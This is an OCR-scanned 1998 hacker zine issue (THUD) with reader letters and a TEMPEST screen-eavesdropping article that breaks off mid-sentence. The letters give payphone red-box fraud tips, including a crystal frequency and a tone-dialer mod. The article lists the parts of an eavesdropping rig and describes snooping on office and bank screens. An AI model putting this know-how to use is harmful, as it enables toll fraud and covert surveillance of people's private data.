Ok...Iast time we had this little section dedicated as a shout out to a bunch of phriends and other people
that have some meaning to the staff. But, as is always the case, there were omissions and errors....First
off, I totally forgot someone who, although it wasn't readily apparent, did have an influence on what we
are doing here. Thanx for reminding me that I forgot you. This one's for you Jazzlicks. Almost...heheh
Also, our phriend Shanen got her named misspelled. "There's only ONE N in Shanenl" DUHI on me!!
Sorry 'bout that honey!!! Forgive me??? Thanx :):)Well, fortunately that was all the mistakes in that
section, at least all the ones that I was made aware of!!! If there were any other mistakes or omissions,
why didn't you tell me!!! Too late now, huh? Ok, I'm not baggin' on you or anything but come on!!! Ok, I
think I've taken up enough space in here for this issue except I still need to say one more statement.
Thanx Mom for hanging in there for me and helping me out while I get this done. Oh, btw, I just got the
cutest little kitten...hi Sparky!!! ok, that's it...see ya on the flip side!!
people that majce it happen:
Editor Packing & Distribution
Brian
Skywise
Rendering &
Assistant Editors Raytracing
OJ, Zack Man
Krokus
Photography Office Babes
Pixel God
Jan, Kate, Connie, Alicia
Artwork FOOD
Joann Digiorno, Dr. Pepper
software that makes it happen:
POVRay for Windows, 3D Studio R4, Microsoft Publisher 98, Windows95, WindowsNT, Netscape
Communicator, Microsoft Internet Explorer, ACDSee, Photoshop 4.0, Corel Draw, Photo Styler,
Quark Express, ICQ, PageMaker, Crystal FTP, mlRC32 and some other mise software.
155N 1099-9205
2397985356295141 -0002
THUD Magazine, Inc.
P.O. Box 2521, Cypress CA, 90630
THUD Magazine (The Hackers Underground Digest) is copyright 1998 by THUD Magazine, Inc.
All rights reserved. No part of this publication may be reproduced or transmitted in any form or by any
means, electronic or mechanical, including photocopying, recording, or by any information storage and
retrieval system, without express written permission of THUD Magazine, Inc.
The contents of THUD Magazine are for educational purposes only and do not necessarily reflect the
viewpoints of the editors, their staff or the various contributors to the magazine. The information is
provided on an "as is" basis. THUD Magazine, Inc., its owners, its staff, nor its contributors take any
responsibilty for losses incurred, real or otherwise, for use or misuse of the information found in this
publication. Responsibility lies solely with the end user. Many of the articles within this publication discuss
procedures, processes and activities which may be illegal, dangerous, or just plain stupid to actually act
out. We do not recommend that anyone rely on the information contained herein as fact. Use common
sense, or if none is available, find someone who has some and borrow it.
Printed in the United States of America
2 Volume 1 Issue 2 - Fall 1998 THUD
influence:
Another Deejay Orion
Frank Jones Lex Luthor
Ray Dios Haque Bachrach
Rick Harrison Telecode
Iron Feather Journal Oxygene
Solar Prophet Charlie Chan
Blacklisted! 411 CyberPunk
McPunk Algernon
Iron Feather Journal and, of course, those wishing to
Jazzlicks remain anonymous.
~hat's inside:
4 Brain Dump - Editors Letter 35 THUD Area Meetings Information
5 Quest ions , Answers, Letters 36 Useful Hardware
8 Nowhere To Run ... - Tempest Technology 39 Massive Frequency List - <40MHz
12 Trojan Horses For Dummies 40 Hack Exchange - Classifieds
14 Low Power Transmitter Kit Sources 42 FAQ: How to find people's E-mail addresses
16 Is It Legal To Be A Hacker And To Hack? 50 Acronyms In The Letter "C"
18 The Ins And Outs of L1DAR 54 Deadlines For Submiss ions To Thud
21 THUD Artwork and Graphics Submission Info 54 Game Reviews - by Cyber Punk
22 The History Of ESS 55 THUD Article Submissions Information
24 Electronic Workbench 5.0 - Review 56 Hacking The Intemet - by Bonnie burton
26 CD-ROM Reviews - IFJ & Group 42 57 The Other Side Of The Street - by Algernon
28 A Parable - does technology inhibit our rights? 58 Cool Pics
29 project t.h.u.d. - 8 Digit DTMF Decoder/Display 58 Back Issue order form
33 Radio Shack Pro-2004 Mods 59 Subscription Information
34 The Art Of War Dialing
other information:
How to contact us: Articles:
THUD Magazine THUD Magazine Articles
P.O. Box 2521 P.O. Box 2521 , Cypress, CA 90630
Cypress, CA 90630
letters:
Subscriptions: THUD Magazine Letters
$20 U.S ., $24 Canada, $35 Foreign P.O. Box 2521 , Cypress, CA 90630
U.S. funds only.
THUD Volume 1 Issue 2 - Fall 1998 3
5rain Dump
a mcssagc f r~m t hc colter
I must say I am very pleased with the responses we've gotten We also have a bitchen article about TEMPEST technology.
from our first issue. People just loved the cover and it seems Man, I 'bout shit my pants when I read this article. It's a very
to be the most catching part of the magazine. The cover IS well written piece of work and I think everyone should pay
what gets peoples attention and we succeeded in doing just close attention to it. I encourage all our readers to share this
that. But, we also made sure the mag was worth picking up one with their friends and co-workers alike. It's really amazing
and looking in between the pretty cover as well. From the what technology can do and how it can be used against you.
letters we've gotten we succeeded there too. Congratulations The scary part about this is that there's no way to detect it!ll
on all those who helped us put it together...you know who you But I'll let you read the article for more info.
are!!!
There's also an excellent article on L1DAR. I'm sure you've at
A few comments I'd like to address concerning a couple of least heard of it. The police use it to snag speeding drivers. It
complaints. One person was not too happy with our article on works on a similar principle as RADAR but uses an infrared
pyrotechnic chemicals. I can understand some of the leftists LASER beam instead. It works almost instantly and you hav
radicals not wanting anything pyro being published in the to have a special detector to detect it. There are, howev r,
wake of things like the Oklahoma City bombing and the ways of defeating or at least making it more difficult for Ih
Unabomber. However, this is a free country and our right to officer to use L1DAR. Read the article and find out more!!!
free speech IS protected by the 1 st Amendment to the
Constitution. Besides, if anyone reads the article it does not Software reviews . Now who doesn't like to read about
detail how to make a bomb. All the article listed was the software before buying. This issue we have a review of
various chemicals that are used in pyrotechnic, or firework Electronics Workbench 5.0 and is this ever a nifty progr m.
displays. The name of the chemical was given and a brief With this software one can design and test an electronic
description of it effect on the outcome of the explosion was circuit on their home PC. You can find out whether your id
given. I'd hardly consider it plans to make a bomb. I know it's is gonna work or not without spending bucks on parts!!1 It can
a touchy subject and I hope objective and open minded handle both analog and digital components, and at the same
people were not offended. Of course, like the saying goes, time!!! It's also a great tool for the beginner in electronics as a
'you can please all of the people some of the time and you virtual lab tool. Read all about it on page 24.
can please some of the people all of the time: but you can't
please all of the people all of the time.' I'm sure there were You'll also find in between our awesome full color cover and
people who thought the 555 Timer article was a bunch of article about how to find peoples E-mail address on the
bullshit too. intemet. Yes, it can be done and there are so many ways to
do it that all I can say is to read the article. There's quite a bit
The cover was a great success and we only had one letter of info there so take your time reading it. Oh, and even if
that complained in any way about it. They thought the THUD you're not interested in finding someone else's e-mail
logo was out of the sixties or something. Hey, I'll have you address, read the article anyway to find out how others may
know our computer designer worked very hard on that logo!! be trying to find yours!!! That way you could take measures to
But rest assured, they aren't taking offense. In fact, the letter stop unwanted e-mail....otherwise known as SPAM. BTW,
was written in a very constructively criticizing manner. The what's wrong with Spam? I happen to like canned meat!!! :)
person also happened to send a floppy with some of their own
logo ideas as well, and we were so pleased with one of their Well, let's see, what else have we got. There's the beginnings
designs that we decided to put it on the cover of this issue. I of quite a comprehensive frequency bandplan. It's more than
hope you all go WOW as much as we did when we first saw a just a freq. list, it actually shows what the allocations are from
full test render of the cover. If anyone else has some cool logo the FCC. Uhmm, there's a cool little article on a few items that
ideas feel free to send them in. However, if you do and want one of our staffers grabbed at ECSC (see the ad on the inside
a chance at us possibly using it, you should send it on disk as back cover) that they thought were the best thing since sliced
paper copies just don't scan very well...basically it'd end up bread. Hmmm...wonderwhat was best BEFORE sliced bread.
looking like shit. Now, on to the insides of this issue. Ok, there's also some reviews on some hacker CD-ROMS
that I'm sure you won't want to miss. You really oughta get
In the tradition of articles for the beginner and novice alike we these discs. They're so packed with info I'm sure everyone
have an article on how to make a Dual Tone Multi Frequency would find something useful.
(DTMF) decoder and display. It's a great little gadget that
anyone with a beginning electronics background should be Well, that's about it for now. I could go on and on describing
able to build. It does use some hard to find parts but sources what's in this issue but then I'd have to add more pages!!! It's
for those are listed. The designer built and tested the device a vicious circle. All in all I'm sure you'll be pleased with what
and I even saw it in action myself. It was quite cool and I can we're doing here. Oh, and just a quick plug for a couple of
say that it definitely works . Oh, we hope you like the other fine magazines...Don't forget to get your latest copies of
centerfold schematic idea. Now you have something else to Blacklisted! 411 and 2600 when you pick up THUD!
stare at while you sit on the pot in the mom!!!
WANT TO START A THUD MEETING IN YOUR AREA?
PLEASE SEND YOUR IDEAS ON THIS TOPIC.
INCLUDE DAYITIME WHEN YOU'D LIKE TO HAVE MEETINGS HELD.
INCLUDE CONTACT INFORMATION SO WE CAN DISCUSS YOUR IDEAl.
SEE PAGE 35 FOR SPECIFIC INFORMATION ON NOTIFYING USOF MEETINGS INYOUR AREA
4 Volume 1 Issue 2 - Fall 1998 THUD
Questions Answers Letters from ou.••
THUD : hackers!!! Oh, and don't forget to check out the website...it's
pretty cool too!!. If others want to start their own meetings for
Just a little quiz for the cover of Vol 1 Issue 1. What is wrong their area, please let us know!! It's an excellent way to meet
with the picture? The phone receiver is off the hook yet the other hackers, exchange ideas, leam something new, and
hook is still in the down position. heck, a it's a chance to make new friends!!! For specifics on
notifying us about meetings, see page 35. There you 'll find the
freaky@SzaticUsers.net information we need to properly inform others of new meets!
Yeah, we were wondering if anyone would notice that one. THUD :
We kinda did that one on purpose for legal reasons. See , that
way it PROVES that the persons taking the picture were not Hi guyz !! Grea t mag . Was picking up my copies of 411 and
REALL Y red-boxing. Sorry, US Government, no crime 2600 and saw this awesome color cover . I just had to grab
committed here!! Nyaah-Nyaaa-Nyaaa-Nyaah-Nyaaah !! :) myself a copy . I'm hooked ! Now I have three different hack ing
When the photographers went out looking they actually found mags to learn from. It's great. They all cover different areas .
the phone in that condition and saved them the trouble of Keep up the good work !!
sticking a piece of gum in the mechanism to keep the hook
down. What luck!! I hate wasting gum. Enrico
THUD ! I picked up your magazine at the news stand a while Thanx for the warm comments. That's actually something we
back. I was impressed. Your audience seems to range from are trying to do is to make sure we don't cover too much of the
beginner to pro. I enjoyed read ing your article on the 555 same exact material, unless we can offer a better or more
timer chip . I have been work ing on a project myself, and updated version of it. We only want to present the best for our
keeping in the tradit ion of dummy articles , here is one I wrote. readers and hope that by there being several sources for
Maybe this could become an open column? Anyway , these material of this nature, we will only accentuate the information
methods I describe are tried and true . I have successfully available and make it easier for everyone to read it.
leeched hard drive director ies , password files, and classified
documents using the tools I descr ibe . I hope that you will THUD:
share this information in your magaz ine.
I am writing to tell you that I enjoyed your first issue of THUD .
Ray Dios Haque I live in Hawaii and have been a Phreaker and Hacker for
President of the United Phreaks Syndicate sometime. I am currently writing an article for your Phine
http://welcome.to/ups magazine, I have also been a avid reader of your sister
publication blacklisted 411 for sometime as well as 2600 .
Yes, we are striving very diligently to include all levels of What drew me to your magazine was the cover showing a
hackers and phreakers. We do not believe in putting down the person Red Boxing a Phone. Well keep up the good work !
newbies and giving them a hard time for asking the simple
questions. THE ONLY STUPID QUESTION IS THE ONE Here 's a short poem for you Phreaks that live in Hawai i.
THAT GOES UNASKED!!! With that said, we are pleased our
efforts are succeeding. The 555 article, and others like it in GTE Hawaiian Tel payphones and Starnet phones accept
this and future issues hopefully will be written in such a way 6.5536MHz Red Box Tones .
that it is not over the heads of the beginners yet still offers
usable information for advanced hackers. The Mililani Phiber Phreak
aka-INOEK ORIHSAMAT
Also, we liked your submission and you 'll find it on page 12 in
this issue. Most areas of the magazine are open and all Great, we look forward to reading your submission and
readers are welcome to send in their written works for possibly printing it. Listen up everyone, if you have good
consideration. It's the spread of information and knowledge experiences that can be used to teach'others of our fine art,
that we're interested in. Send submissions to WRITE ABOUT IT and SEND IT IN/!! The whole idea is an
exchange if information and knowledge.
THUD Magazine Articles
P.O. Box 2521, Cypress, CA 90630 Oh, and thanx for that very short poem I had to read it twice
to understand it. Very profound...moving and....short....:)
THUD :
THUD:
Meeting: Wow Superstore - Sahara - Decator , Las Vegas
Nevada . Time: First Friday every month, 8pm. Just wanted to say cool mag. I like the color cover. I was
wondering if you guys have plans of going FULL color inside
www.nevadaunderground.org and out?
freaky@nevadaunderground.org
Derrick 12
EXCELLENT!!! Only one issue out so far and the response
has just been so awesome. Listen up all you Lost Wages We haven't seen a need to go color inside. But who knows?
folks, attend this meeting and support the local Vegas
I've NEVER seen THUD before!
What Gives?
1. We're brand new and have not been for sale anywhere before this.
2. We're still looking for people to write for us.
3. We still need LETTERS sent in.
4. We still need photographs and artwork sent in , as well.
5. Read above.
THUD Volume 1 Issue 2 • Fall 1998 5
THUD : address. We've been concentrating so much on ·putting out
the mag and getting everything just right for our readers. We
I love the magazine. it seems to be far more clear to newbie are DEFINITEL Y interested in having a THUD website. It
lamers like myself than either 2600 or Blacklisted. Cuz of yer WILL happen, it's just a matter of when is all. An e-mail
common question thing, I finally decided to try my hand at a address is in the works and will surely be available before the
red box. I went the easy way, downloaded Cool Edit, and website. In fact, we should have that available and printed in
copied the sounds to a microcassette recorder. Unfortunately, the next (Fall, 1998) issue.
I don't think any of the phones around here are old enough for
it to work. But it was a grand learning experience nonetheless. THUD:
McPunk You're 'zine kicks ass manll! Where have you been all my
life? I really dig the cover. It looks so 3D. It's a great acid trip.
Thanx for the compliments. We're not trying to out do or put HA HA HA. But this picture, the phone isn't even off the hook.
down either Blacklisted or 2600. Heck, Blacklisted is our sister How are you going to do any red boxing like that? Did you
publication, why would we knock them? Anyway, they are guyz brake [sic) it or something? Ought to tell the phone
both very fine magazines and I hope they both survive for a company on you!! But it's still cool. I really liked the chemical
long time. Many of us here read both of them as well. list. You should do a list of drugs. That'd be cool. Cuz like
what you have I can't smoke. I suppose I could smoke a
You're absolutely right about why your Red Box won't work. capacitor but I hear those are bad for you. Ever smoke a
The telephone companies got smart (oxymoron?) and capacitor? They smell cool. I love sticking them in power
decided to modify the phones so that the mouthpiece is muted strips and turning them on. POW!!I
until the coins are dropped, the number is dialed, and the
connection is completed. Supposedly one can remove the AcidPhreak
microphone element from a phone which DOES accept Red
Boxing and place into the mouthpiece of a phone which does Whoa, dude, like ease up on the drugs or sumthin, man.
not and defeat this sort of trickery. But I'm sure that that does You're like trippin too much, man. Like man, I dunno what to
not work everywhere. Alas, it's a never ending arms race to say, man. Pass the bong, man. HAHAHAH ANYWAYIII as
see who can outsmart whom. said in one of the letters above, it was kinda done on purpose
to prevent any legal probs . See above for more details. As for
THUD: drugs...uhmm....DRUGS ARE STUPID!!! didn 't you know
that? Besides, I don't think we could get away with that very
Can you inform me of some computer defense attorneys? It's easily. We'd have the DEA on our backs. Now you wouldnY
always good to keep in touch with a few. want that to happen , would you?
freaky@SzaticUsers.net THUD:
You're absolutely right, knowing a few people who understand What does the crystal look like in the 43-146 tone dialer from
hackers and also have the knowledge of our 'legal' system Radio Shack look like? In the first issue you said it looked like
could come in handy. hopefully none of us will ever need one. a "capacitor: What is a "capacitor" and what does it look
But, to answer your question, we donY have any attorneys in like??? Also, how do you install a new crystal into the 43-146
particular that we can recommend . Perhaps there's some version of the Radio Shack tone dialer?
attomeys out there who are open minded and read our zine
that could send us a note? Heck, ask us to put an ad in the ORYAN28
mag, I'm sure you 'll drum up some business. Another great
idea would be for someone to interv iew an attorney Ok. First, a capacitor is an electronic component that is
discussing the various legal aspects of hacking and what's capable of storing a very small charge. They are used in a
involved when someone is alleged to have committed a multiple of ways including frequency filtering, oscillators, and
'hacking' crime. analog delays. They come in a multitude of shapes and sizes,
ranging from tiny little brown discs about 3 millimeters in
THUD: diameter with two wire leads coming out of one side to huge
'cans' with dimensions of several inches. Since there 's a
Dudes. I saw your mag on display when I went to go pick up second letter asking about the 43-146 Tone Dial mod, see the
my copies of Blacklisted 411 and 2600 . That color cover really answer to the very next letter her for specifics.
caught my attention. I had NO CHOICE but to check it out.
Really cool. Well, on to my question . I was wondering if the THUD:
FCC regulated line of sight infrared laser data links. Me and a
friend were thinking of setting one up to experiment with and In the first issue of the first volume of THUD you had Q&A
can't seem to find any literature on this issue. Maybe you can instead of letters to the editor and you described some of the
help? more popular boxes . Could you please send me more
information on making these boxes? I already made a beige
Bright Eyes box and I am making a red box from a Radio Shack Tone
Dialer and a 6.5 MHz crystal. I need to know how to replace
Wow, everyone seems to really like our cover, which is good. the normal crystal in the 43-146 and what the disguised
That was the idea. As for the IR data link, the FCC considers crystal looks like. I heard it looks like a capacitor but I have no
anything above 300GHz amateur and IR is WA Y above that idea what the looks like. I would like to make as many
so you 're safe. Just be careful with the power and your eyes!! different boxes as I can. Thank you very much,
Just because the laser radiation is invisible does not mean it
will not damage your eyes. Hey, if you get this thing working, Michael Davis
maybe you could write up and article for us. Maybe even
something so that others can give it a try? Hope it works!!! Yeah, since it was the first issue, how could we have a Letters
to the Editor section? hehehe but now we do and now we
THUD: have letters to print as well. I'm glad you have an interest in
the color boxes and in electronics in general. You're the
Does THUD magazine have a website or email address? second person to ask about the crystal in the 43-146 Tone
Snail mail just supports federal government. Dialer.
freaky@SzaticUsers,net Just to be accurate we went out and bought the 43-146 Tone
Dialer from our local Radio Shack. The crystal in the tone
Boy, you're sure full of questions , but we're glad to answer dialer you are talking about should look like a brown ceramic
them! At this time we do not have a website or an e-mail dipped component that's wider than it is tall, with two leads
6 Volume 1 Issue 2 - Fall 1998 THUD
coming out of one side. Ours was marked "25.38M " which is music. It's not professional software but what do you expect
a funny way of saying 3.58MHz. Guess they 're really trying to for free? Oh yeah, it helped me make the Red Box tones like
throw us off. It's soldered to the board right next to the two what was suggested in the article. I'm fairly new at all this
white wires that go to the smaller piezo-electric speaker. The hacking and phreaking business and I'm not really interested
crystal which must replace the original one in the tone dialer in ripping anybody off, just want to leam what I can about the
is of a different size and shape and there may not be enough world around me. Anyway, I taped the tones out to a greeting
card and went around checking some of the pay phones in my
room in the box for it to fit properly. If you are not familiar with
working on electronics and soldering, this could be an almost area. Mind you I did this just for experimentation and
curiosities sake only!!! hehehe I must have tried at least a
impossible , if not at least a very frustreting task. But, there is
no better way to learn than by doing . Experience , and dozen phones (I'm really persistent) before I found an old beat
especially mistakes , are the best teacher. up phone outside one of the local liquor stores that let me
phool it. I can really see how phreaking used to be big in the
THUD: Eighties before the phone companies got wise to most of the
tricks. Anyway, just wanted to share my experiences with you
Hey cool cover for the first issue. I took this pic of a payphone and send my $$$ in for a subscription. Keep up the good
that was ripped out, it's cool because you can use a lineman's work!!
handset on the wires. They never had the phone
disconnected. P.S. sorry about my thumb in the top. Prince Nothing
So Cal
Heya Prince . Now that's the spirit of a true hacker/
phreaker...persistence to satisfy curiosity. If it wasn't for
curiosity we 'd have no advancements in science, computers,
communications, or ANY field for that matter. It was once said
to me that the definition of a scientist is someone who seeks
knowledge for the sake of knowledge . Does that make all us
hacker/phreakers scientists? Hmmm ...that's an interesting
philosophical thought!! HAHAHA "So where 'd you get your
degree?" "From the back of THUD magazine!!!"
heheh ..sorry...off on a tangent. I'm pleased that our article
reviewing Cool Edit was of help to you . Another satisfied
customer. :) Hey, if you get any really cool remixes send
those in too. We may not be able to print it but I'd love to hear
what you've got!! One of our staff dabbles in remixing other
peoples music as a hobby .
THUD:
Man, that cover was really cool. All that text in the background
was really neat. And it was all real stuph too!! I recognized on
the back cover parts of a phile about hacking AOL!!! Seeing
that ASCII text reminds of when BBS's were king and us
hackerz spread our material via philez on warez boardz and
such. Oh those were the days. But due to the internet, BBS
has gone out of style. Most of the boards in my area are gone
and the ones that do remain and pay boards supported by
wanna be rich kids. The good stuph never lasts, I tell ya. But I
really like what you've done with the mag. It's got the flavor of
those old philez, just in a new and updated format. With the
internet the size it is it is so hard to find good information
these days. Seems like any old geek can start up a web site
and put anything they want up there. Doesn't matter if it's
correct information, or even their own!! I've seen copies of the
same stuff on multiple sites and many of them spout it off as
their own work. Sad...l don't recall that happening in that dayz
of yore. But enough of my reminiscing, thanx for the blast to
the pastl!
Douglas M.
Hey, that's pretty cool . Stupid phone companies . And people The Stroker
wonder why we get ripped off on our phone bills!!! hahahah It
could be that they don't even KNOW that it's missing . A lot of I hear .ya on that one. It really seems the BBSer is a dying
times they won't know something like this until someone breed. There are still a few BBS out there but like you said
reports it. Someone probably snagged the phone to steal the they're mostly pay boards and don't have shit on them. Any
coins. It's much easier to take the whole phone and break others that are still out there are for those die hards that don't
open the coin box in private than it is to try and break into it in want to see a good thing pass. I see much of the problem as
place . Mind you , I'm not recommending such practices, just a generation gap of sorts. When we got into computers, BBS
infonn ing the unknowing that this is what happens in the real were the only game in town . Then came the net . Now , when
world where the media and corporations are not in as much new kids get into computers they go straight to the net
control as they like to think they are. :) If this phone belongs to instead. Now don't get me wrong. The net is a great thing. I
the phone company, chances are that a linemans testset will couldn 't live without it. But it seems so cold and impersonal
NOT work on the loose wires . Oh, nice thumb print!!! when compared to a BBS. On a BBS you could chat with
people that you knew were in your area and if you went to a
THUD: local user meet you could actually see the faces behind the
screen . On the net you have no idea who you might be talking
Good 'zine. Lotsa cool info. I really liked the review that Solar to. Heck , it could be some private detective passing as a
Prophet did on Cool Edit. I have found that program to be Canadian lumbefjack lady with a fetish for wood trying to snag
even more useful than the article even hinted at. Shit, you people who just want a fun convo. Don't recall that problem
could probably write a whole book on just that one little BBSing. I don't think BBSing will ever truly die, just as people
shareware program. I'm a sort of wanna be musician and still restore and drive old Model T Fords . There will always be
Cool Edit helped me with a lot with being able to remix my those who love them and won't allow them to die.
THUD Volume 1 Issue 2 - Fall 1998 7
Nowhere to run...Nowhere to hide...
The vulnerability of C/U's, CPU's and peripherals
to TEMPEST monitoring in the real world..
The following article is reprinted by pennission. We suggest you visit WWW.THECODEX.COM for more infonnation.
It's a really awesome website full of Infonnatlon on the latest In surveillance technology and how vulnerable we are
to It's misuse. Don't forget to pick up the winter issue of THUD as we will have further Infonnatlon on TEMPEST
technology. You won't be dlsappointedl
George Orwell wrote the classic "1984" in 1949. He depicted a world in which the government controlled it's citizens and a
world devoid of privacy. Many of the things Orwell wrote almost fifty years ago have come to pass.
Surveillance technology has progressed to the point that is possible to identify individuals walking city streets from satellites in
orbit. Telephone, fax and e-mail commun ications can routinely be monitored. Personal information files are kept on citizens
from cradle to grave. There is nowhere to run...nowhere to hide...
The advent of the personal computer has revolutionized the way we do business , keep records, communicate and entertain
ourselves. Computers have taken the place of typewriters, telephones, fax and telex machines .
The lntemet has opened up a new world of high speed and inexpensive communicat ions. How secure and private is it? There
are many encryption programs and hardware devices available for security purposes but what about the computer terminal
itself? How safe is it? What are it's vulnerabilities? Hackers have been known to cause mischief from time to time...ls it
possible for an adversary to snoop on your private data? Can Big Brother?
Suppose it was possible to aim a device or an antenna at your apartment or home from across the street or down the block.
Suppose you were working on a confidential business project on your PC. Suppose that device down the block could read
what you were typing and viewing on the CRT? Feeling uncomfortable? Suppose that device could monitor everything you do
on your computer by collecting electromagnet ic radiation emitted from your computer's CRT, CPU and/or peripheral
equipment, reconstruct those emissions into coherent receivable signals and store them for later review? Feeling faint? Good.
The technology exists...and it has for some time....
You don't have to worry about a "middle of the night" break-in by some clandest ine government black-bag team to plant a bug.
They never have to enter your home or office. Seedy looking private investigators or the information warrior won't be found
tampering with your telephone lines in the basement either...it's not necessary ...all they have to do is point an antenna...safely,
from a distance away...and collect your private data...
This surveillance technique has become known as TEMPEST monitoring. TEMPEST stands for Transient Electromagnetic
Pulse Standard. It is the standard by which the government measures electromagnetic computer emissions and details what
is safe (allowed to leak) from monitoring. The standards are detailed in NACSIM 5100A, a document which has been classified
by the National Security Agency . Devices which conform to this standard are called TEMPEST certified.
In 1985, the Dutch scientist Wim van Eck published a paper which was written about in the prestigious "Computers & Security"
journal, "Electromagnetic Radiation from Video Display Units: An Eavesdropping Risk?" Vol 4 (4) pp 269-286. The paper
caused a panic in certain government circles and was immediately classified as is just about all TEMPEST information.
Wim van Eck's work proved that Video Display Units (CRrs) emitted electromagnetic radiation similar to radio waves and that
they could be intercepted, reconstructed and viewed from a remote location. This of course compromises security of data
being worked on and viewed by the computer's user. Over the years TEMPEST monitoring has also been called van Eck
monitoring or van Eck eavesdropping .
In 1990, Professor Erhard Moller of Acchen University in Germany published a paper, "Protective Measures Against
Compromising Electromag netic Radiation Emitted by Video Display Terminals" . Moller's paper which updated in detail van
Ecks's work also caused a furor.
The government's policy of TEMPEST secrecy has created a double edged sword. By classifying TEMPEST standards, they
inhibit private citizens and industry by failing to provide the means of adequately shielding PC's and/or computer facilities.
There is an old saying, "You can't drive a nail without the hammer". If concemed personnel don't know the minimum standards
for protection...how can they shield and protect? Shielding does exist which can prevent individuals and companies from being
victims to TEMPEST monitoring. But without knowing the amount of shielding necessary ...
Perhaps this is the way the govemment wants it... My work has focused on constructing a countermeasures device to collect
and reconstruct electromagnetic emissions from CRT's, CPU's and peripherals to diagnose emission levels and give security
personnel a hands-on tool with which they can safeguard their computer data.
In testing my countermeasures device I concentrated on interception and reconstruct ion of the three types of emitted
electromagnetic radiation written about in van Eck and Moller's work.
1. Electromagnetic radiation emitted from CRT's· similar to radio waves.
2. Shell waves on the surface of connections and cables.
3. Compromising radiation conducted through the power line.
I found my greatest success (distance & quality) was in the collection of emitted radiation from the CRT although we were
equally successful in our other experiments . In our opinion the greatest danger of TEMPEST monitoring comes from off
. premises and we decided early on to concentrate in this area. A workable countermeasures tool would give security personnel
a handle on distance from which compromising electromagnetic radiation could be collected. Hopefully full countermeasures
would then be implemented.
8 Volume 1 Issue 2 - Fall 1998 THUD
This also is a double edged sword . The device I built albeit a countermeasures tool. ..can be used as an offensive TEMPEST
monito ring device. My concerns however are that if such a device is not made available to the private sector...then the private
sector is at the mercy of the information warrior using it.
TEMPEST MONITORING ...HOW IT WORKS
TEMPEST monitoring is passive . It cannot be detected . The computer emits compromising radiation which can be
reconstructed from a remote location . There is no need to ever come near the target. No reason ever to go back to change a
faulty bug like the Watergate burglars ...lt can be performed from an office or a vehicle with no chance of discovery . The
premise is very simple.
All electronic devices emit some low level electromagnetic radiation. Whenever an electric current changes in voltage level it
generates electromagnetic pulses that radiate invisible radio waves. Similar to the ripples caused by dropp ing a small rock into
a quite pool of water. These electromagnetic radio waves can carry a great distance .
Computer monitors like televisions contain an electron gun in the back of the picture tube which transmits a beam of electrons
(electric current). When the electrons strike the screen they cause the pixels to fluoresce . This beam scans across the screen
from top to bottom very rapidly in a repetitive manner, line by line, flashing on and off, making the screen light and dark ,
creating the viewed image . These changes in the high voltage system of the monitor generate the incoherent signal that
TEMPEST monitoring equipment receive, reconstruct and view.
We have found that most monitors emit signals in the 2 to 20 Mhz range although harmonics are fairly strong and can be
intercepted . Radiated harmonics of the video signal bear a remarkable resemblance to broadcast TV signals although various
forms of sync must be restored.
Associated unshielded cabling can act as an antenna and increase interception range. Emissions can be conducted down
power cables and supplies. Computers attached to unshielded telephone lines are easy prey as the telephone line acts as an
excellent antenna . Printers and their cables are not immune either. The average computer setup in the home or office could
be compared to a base station transmitt ing it's signals all over the neighborhood .
Put quite simply, it is easy for someone with basic electronics knowledge to eavesdrop on you while you are using a computer.
They might not be able to steal everything from the hard disk but they can view anything you do....see anything you see...
HOW IT'S DONE•.•THE COMPONENTS
A good commercial wide band radio receiver preferably designed for surveillance (requires a little modification) with spectrum
display. Sensitivity and selectiv ity are paramount. Not all receivers will do the job adequately.
Horizontal and vertical sync generator. Commercially available and will require some modification .
Multi-Scan Video Monitor with Shielded cables .
Active Directional Antenna (phased antenna array) with shielded cables. Think radio telescope .
Video tape recording equipment. For capture and later review.
WHAT WE WERE ABLE TO CAPTURE...
Bench testing of the unit was quite successful in and around the office . Several computers were targeted and interception of
the data was simple after injecting and restoring vertical and horizontal sync. We had no problem viewing computer screens
on adjacent floors in the building (we were sometimes hindered by noise) and were able to differentiate (to my surprise)
between different computers in a large office . We aimed our device out the window across the street at an adjacent office
building and were able to view CRT screens without too much difficulty .
I should mention here that during the field tests NO DATA WAS STORED FROM TARGET COMPUTERS . We were not on an
eavesdropping mission. We simply were interested in testing OUR equipment ; not spying on others.
Field testing of the unit was quite different and required continuing manipulation of the equipment. From a vehicle in a
suburban area we were able to view active televisions inside homes ( the cable/pay-per-view people could have a field day)
and what programs residents were watching. When we came across homes with active computers we were able to view
CRTs . Average range was approximately 300 yards.
We continued to test the device in a suburb of New York City with startling results . We were able to view CRT screens at ATM
machines , banks, the local state lottery machine in a neighbo rhood candy store, a doctor's office, the local high school , the fire
department, the local police department doing a DMV license plate check , a branch office of a securities trader making a stock
trade and the local gas station tallying up his days receipts. We didn't expect that any of our "targets" would be TEMPEST
certified and we were correct.
BIGGER FISH IN A BIGGER POND
We took our DataScan device , as we named it, to New York City. The Big Apple . We were interested in testing the integrity of
various computer facilities and also wanted to see how our device would operate in an urban environment.
Let me start off by saying New York is in a lot of trouble . We started at Battery Park (the southern tip of Manhattan Island) and
headed north to Wall Street. The US Customs building leaks information as well as the Federal Reserve. Wall Street itself was
a wealth of information for anyone interested . With hundreds of securities and brokerage companies located within a few
blocks of each other, all an information warrior need do is rent an office with a view and aim his antenna. We were able to view
CRT's in MANY executive offices .
The World Trade Center was fertile . It afforded open parking areas nearby with millions of glass windows to snoop ...we were
THUD Volume 1 Issue 2 - Fall 1998 9
most successful snooping the lower floors from the street. We borrowed a friends office at mid-tower in the south bUilding and
were able to view CRrs in the north building easily.
We headed east towards the New York Post newspaper offices and read the latest news off their monitors (which was printed
the next day). We headed north towards City Hall and NYPD Police Headquarters . Guess what? They're not TEMPEST
certified either...Neither is the United Nations, any of the midtown banks, Con Edison (the power company) on First Avenue ,
New York Telephone on 42nd Street or Trump Tower! Citicorp's computer center in the SkyRink building on West 33rd Street
was a wealth of information also...
We found that with the proper frequency tuning, antenna manipulation, reintroduct ion of sync and vehicle location , we could
monitor just about anyone, anywhere, anytime . There is no doubt in my mind that TEMPEST eavesdropping is here to stay
and something that must be dealt with by computer and security professionals.
Passwords, files, proprietary data and records are all vulnerable to the information warrior using TEMPEST monitoring
equipment in a non TEMPEST certified world .
POTENTIAL USERS OF TEMPEST MONITORING
Big Brother:
Yes, that's right. He does bug businesses. Sometimes with a court order and somet imes without one. It's unclear under
present American law whether or not a court order would be needed to collect TEMPEST information . You never know when
Big Brother's on a witchhunt. Maybe he suspects you of being a tax cheat , of insider trading, leftist sympath ies, etc.
Remember Watergate? Now, the FBI wants to be able to tap EVERY telephone , fax and data line in America at the turn of a
